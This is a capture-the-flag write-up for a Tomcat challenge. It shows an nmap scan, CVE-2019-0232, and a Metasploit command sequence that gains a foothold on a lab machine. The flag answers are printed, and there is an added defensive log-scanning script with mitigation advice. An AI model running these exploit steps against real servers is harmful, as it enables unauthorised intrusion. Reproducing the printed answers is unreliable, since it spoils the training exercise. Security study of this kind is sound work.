# Ready, set, elf.

## Video

{% embed url="<https://www.youtube.com/watch?v=6DOp2Fn1AsQ&feature=emb_logo>" %}

## Resources

`systeminfo`

[URL encoded](https://www.techopedia.com/definition/10346/url-encoding)

## Challenge

### What is the version number of the web server?

```
nmap -Pn -sC -sV -O -v 10.10.198.75
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONaceuqHm3hBLZ3GGY%2F-MONb4IZxoAbOFVlVeR_%2Fimage.png?alt=media\&token=cf7db7c4-1d8d-4512-b045-3956e6580f55)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONb6fs3SSRYt8QjAm-%2F-MONbMm7QA3o1Q_AUXvC%2Fimage.png?alt=media\&token=a22a844b-c58d-4b5d-a081-e9071361dcbb)

{% hint style="success" %}
9.0.17
{% endhint %}

### What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONbzwv9WpJkYkt8YJi%2Fimage.png?alt=media\&token=a6194bc6-7bae-4646-82c9-103614af387f)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONcEBnY2e7fzKGSdUo%2Fimage.png?alt=media\&token=7f223d04-365d-4beb-8bac-6e5bd74f9637)

{% hint style="success" %}
CVE-2019-0232
{% endhint %}

### Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONl0igeRDsg1d1YMiM%2Fimage.png?alt=media\&token=d6f32dd8-f4fe-4d16-94a8-532b6c4d2150)

```
msfconsole
search 2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
show targets
set TARGET 0
show options
set RHOST 10.10.198.75
set targeturi /cgi-bin/elfwhacker.bat
exploit
```

{% hint style="success" %}
**`No answer needed`**
{% endhint %}
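
A defender-side view of the same request, as an added example that is not part of the original writeup: CVE-2019-0232 is reached through Tomcat's CGI servlet on Windows when a query string is handed to a batch script as command-line arguments, so access logs can be triaged for `.bat`/`.cmd` requests whose query has no `=` and decodes to `cmd.exe` metacharacters. The log lines, addresses, and the `classify`/`scan` names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a common-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters cmd.exe treats as separators, redirection, escapes or expansion
CMD_META = set('&|<>^"%')
SCRIPT_EXT = (".bat", ".cmd")

# Constructed sample log lines (not taken from the challenge machine)
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2020:10:01:02 +0000] "GET /cgi-bin/elfwhacker.bat HTTP/1.1" 200 512
10.0.0.5 - - [12/Dec/2020:10:01:09 +0000] "GET /cgi-bin/elfwhacker.bat?name=elf HTTP/1.1" 200 530
10.0.0.9 - - [12/Dec/2020:10:02:40 +0000] "GET /cgi-bin/elfwhacker.bat?%26ver HTTP/1.1" 200 88
10.0.0.9 - - [12/Dec/2020:10:02:44 +0000] "GET /cgi-bin/elfwhacker.bat?list HTTP/1.1" 200 75
10.0.0.7 - - [12/Dec/2020:10:03:00 +0000] "GET /index.jsp?x=%26 HTTP/1.1" 200 1024
"""

def classify(line):
    """Return (verdict, decoded_query) for a batch-script request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not unquote(path).lower().endswith(SCRIPT_EXT):
        return None                      # not a .bat/.cmd CGI target
    if not query or "=" in query:
        return ("ok", unquote(query))    # form-style query: not passed as argv
    # RFC 3875 section 4.4: a query with no unencoded "=" becomes command-line
    # arguments for the script, which is the input path this CVE relies on.
    decoded = unquote(query)
    if CMD_META & set(decoded):
        return ("alert", decoded)        # shell metacharacter reaches cmd.exe
    return ("review", decoded)           # argv-style query, no metacharacters

def scan(log_text):
    """Return [(line_number, verdict, decoded_query)] for batch-script requests."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        res = classify(line)
        if res is not None:
            hits.append((n, *res))
    return hits

if __name__ == "__main__":
    for n, verdict, query in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict:6} query={query!r}")
```

On the server side, the exposure depends on the CGI servlet being enabled with its `enableCmdLineArguments` init-param set to `true`; keeping it `false` and upgrading Tomcat past the 9.0.17 identified above removes this input path.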

### What are the contents of flag1.txt?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONjpREYL7FFSCPtS0u%2Fimage.png?alt=media\&token=354664a8-65fc-49f3-b1e2-c98a5c380ee6)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONksnr8k2uZtMq8EeF%2Fimage.png?alt=media\&token=42d786c4-119c-438b-b3cd-ab7c81b6f9e1)

{% hint style="success" %}
thm{whacking\_all\_the\_elves}
{% endhint %}

### Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

{% hint style="success" %}
**`No answer needed`**
{% endhint %}
